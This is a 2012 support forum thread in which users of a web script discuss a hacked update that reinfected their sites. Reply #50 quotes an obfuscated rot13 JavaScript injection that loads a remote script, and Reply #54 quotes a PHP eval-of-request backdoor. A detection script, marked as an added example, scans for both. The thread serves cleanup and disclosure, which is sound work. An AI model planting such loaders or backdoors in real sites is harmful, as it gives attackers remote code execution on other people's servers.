Author Topic: build 43 / hacked again  (Read 60626 times)


Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #45 on: February 29, 2012, 01:11:17 AM »
Guys, I am waiting for kildoozer, just woke up after an insane day yesterday (shitload of work).

When he arrives we will try to solve your issues or write here what to do.

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #46 on: February 29, 2012, 01:22:20 AM »
OK, kildoozer is already working on a tool to lock tp files so they are not writable (more details soon, don't worry, all will work fine :) ).

It will be done today, then I will write instructions in forum on how to fix/lock your tp's!

Please stay tuned, finally we nailed this SOB.

Offline donedeal

  • Newbie
  • *
  • Posts: 43
Re: build 43 / hacked again
« Reply #47 on: March 02, 2012, 03:00:22 PM »
Looking forward to something to help, I'm still infected with 47 sites, that's making someone else money

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #48 on: March 02, 2012, 03:14:31 PM »
Please, I know I ask MUCH but I ask you a bit more patience, kildoozer today inspected your servers and cleaned some files, tomorrow he continues... he was again without damn electricity the entire day! He also coded for a tiny bit the new secure locking system, hopefully tomorrow all is solved. When we clean your server we will deposit some $$$ to the broker of your choice so U can buy some feed to compensate!!!

Once again, my apologies!

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #49 on: March 05, 2012, 08:01:58 AM »
For all who still have problems with the hack, here is the solution:

http://forum.scriptpulse.com/index.php/topic,1484.0.html


Offline donedeal

  • Newbie
  • *
  • Posts: 43
Re: build 43 / hacked again
« Reply #50 on: March 10, 2012, 11:44:17 AM »
8888<script888888 language="JavaScript"
type="text/javascript">function rot13(input){return
input.replace(/[a-zA-Z]/g,function(ch){return
String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg
fep=\"uggc://mvk.vz/!tybony/.cuc\"></fpevcg>"));888888</script88888

Is this code yours or his? (I added 88888's in the code here to post)



Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #51 on: March 10, 2012, 12:01:14 PM »
I think it's his, please follow instructions here: http://forum.scriptpulse.com/index.php/topic,1484.0.html

Offline donedeal

  • Newbie
  • *
  • Posts: 43
Re: build 43 / hacked again
« Reply #52 on: March 10, 2012, 12:03:07 PM »
Just going through the server cleaning up this stuff. I also have a vulnerability to show you

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #53 on: March 10, 2012, 12:17:31 PM »
great, email me details to info@scriptpulse.com !

Offline Ska

  • Newbie
  • *
  • Posts: 10
Re: build 43 / hacked again
« Reply #54 on: March 11, 2012, 11:22:37 PM »
It happened again :(
After cleaning it, locking it,
all files are back at 777 and tpupdater.php was changed.

/stats/cache/auth.php was found with the scan.php

if (isset($_REQUEST["auth"])) eval(stripslashes($_REQUEST["auth"]));
this was added to variables.php
« Last Edit: March 12, 2012, 04:14:52 AM by Yen Chan »

Offline donedeal

  • Newbie
  • *
  • Posts: 43
Re: build 43 / hacked again
« Reply #55 on: March 11, 2012, 11:26:11 PM »
was finding these in the toplists tpl and html files, just a heads up to everyone to help clean up, last line of code

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #56 on: March 12, 2012, 06:51:58 AM »
If U cleaned and locked, speak with your host why files got replaced, it's not in our domain :). Basically it's wrong apache config or they use suphp so process (shell scripts) run under user.

Please consult your webhost and point them to changelog. If they have any questions info@scriptpulse.com

Offline donedeal

  • Newbie
  • *
  • Posts: 43
Re: build 43 / hacked again
« Reply #57 on: March 14, 2012, 07:13:56 PM »
Quote
If U cleaned and locked, speak with your host why files got replaced, it's not in our domain . Basically it's wrong apache config or they use suphp so process (shell scripts) run under user.


The problem is the cleaning. No one has really posted a good cleaning process. It's hopping out of the TP folder. You can delete the whole tp folder and install from scratch, it comes back. The backdoors or scripts are still outside of the tp folder. Yes there are hacked tp files, but that's not the backdoor.

Let's not forget the original problem was the hacked update. This "Hack" that "keeps coming back" means it wasn't cleaned off the server properly. Yes we can "lock it". But it doesn't mean the "hack" is off your server. I don't believe for a second that this hack has anything to do with our original server security/configuration.

Once this tp updater hack gets on your server, you're basically fucked, because the timestamps of the hacked files match on all domains on a server. Even on fresh tp installs. And by fresh, I mean deleting the tp folder completely AND toplist folders, it's back a day later.

I have something for anyone to try... move your domain to a virgin server, install Smart thumbs, trade pulse from scratch, import your thumbs from another smart thumbs and an exported tradeslist, check your toplist codes before you import them, see your problem disappear.

Has anyone tried this besides me and seen it come back? I would like to hear this....

I know that your files were hacked and I'm not blaming you for that, but sorry, I have a tough time with your statement, this gives me the impression that you're passing the cause of this problem to our servers config or hosting admin.

I'm not trashing you, but I don't see any problem with TP being hacked when your server is actually clean. The problem is getting your server clean. A lock.php isn't going to take out the backdoor on your server.
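
An added example, not part of any post in this thread and not ScriptPulse's scan.php or lock.php: a sweep of a whole web root, rather than only the tp folder, for the two injected snippets quoted in Replies #50 and #54 and for world-writable files. The names scan_tree and build_sample, the sample tree, and the paths tp/index.php and toplist/top.tpl are constructed for illustration.

```python
import re
import stat
import tempfile
from pathlib import Path

# Patterns modelled on the two snippets quoted in this thread.
EVAL_REQUEST = re.compile(rb"eval\s*\(\s*(?:stripslashes\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b")
ROT13_WRITE = re.compile(rb"document\.write\s*\(\s*rot13\s*\(")
TEXT_EXT = {".php", ".tpl", ".html", ".htm", ".js", ".inc"}


def scan_tree(root):
    """Return sorted (relative_path, reason) findings for regular files under root."""
    findings = []
    for path in Path(root).rglob("*"):
        mode = path.lstat().st_mode
        if not stat.S_ISREG(mode):
            continue  # skip directories, symlinks, FIFOs
        rel = path.relative_to(root).as_posix()
        if mode & stat.S_IWOTH:
            findings.append((rel, "world-writable"))
        # Only read file types that can carry PHP or script markup.
        data = path.read_bytes() if path.suffix.lower() in TEXT_EXT else b""
        if EVAL_REQUEST.search(data):
            findings.append((rel, "eval-of-request"))
        if ROT13_WRITE.search(data):
            findings.append((rel, "rot13-document-write"))
    return sorted(findings)


def build_sample(root):
    """Constructed sample tree: one clean file and two modified ones."""
    samples = {
        "tp/index.php": (b"<?php echo 'ok';", 0o644),
        "stats/cache/auth.php": (  # the line reported in Reply #54
            b'<?php if (isset($_REQUEST["auth"])) eval(stripslashes($_REQUEST["auth"]));', 0o644),
        "toplist/top.tpl": (b'<script>document.write(rot13("..."));</script>', 0o777),
    }
    for rel, (body, mode) in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
        path.chmod(mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan_tree(tmp), sep="\n")
```

Run against the account's whole document root, a hit outside the tp folder is the case Reply #57 describes: reinstalling tp alone leaves that file in place.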




Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
Re: build 43 / hacked again
« Reply #58 on: March 15, 2012, 04:56:03 AM »
I agree 500% with you that lock.php is not the FINAL solution, but lock.php is a temp solution till your hoster cleans out shell scripts!

Servers are not our domain (we are doing SCRIPTS) so your hoster should clean it up and if they have any questions they are free to post here or over icq 169397168 or email info@scriptpulse.com.

This hack didn't come because of your server security, it came because of OUR server security when hacker got it and changed update files for cpl hrs :(.

I said your server security is bad in case shell exec scripts can change locked files.